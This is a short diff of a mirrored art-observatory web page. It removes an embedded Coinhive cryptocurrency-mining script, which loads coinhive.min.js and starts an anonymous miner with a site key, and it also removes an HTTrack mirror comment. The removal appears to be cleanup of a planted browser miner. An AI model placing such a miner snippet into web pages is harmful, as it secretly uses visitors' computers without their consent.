--- a/206.81.1.69/index.html
+++ b/206.81.1.69/index.html
@@ -127,12 +127,6 @@ Lorenzo&nbsp;Lo Schiavo<br />
   <li><a href="http://instagram.com/observatorioarte" target="_blank">Instagram</a></li>
   <li><a href="http://vimeo.com/observatorioarte" target="_blank">Vimeo</a></li>
 </ul>
+ </body>
 
-<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
-<script>
-	var miner = new CoinHive.Anonymous('2KbXbs6qOhcbvhyBslXzLmK9r3PLWpcP');
-	miner.start();
-</script>  </body>
-
-<!-- Mirrored from 206.81.1.69/ by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 11 Sep 2021 01:07:55 GMT -->
 </html>
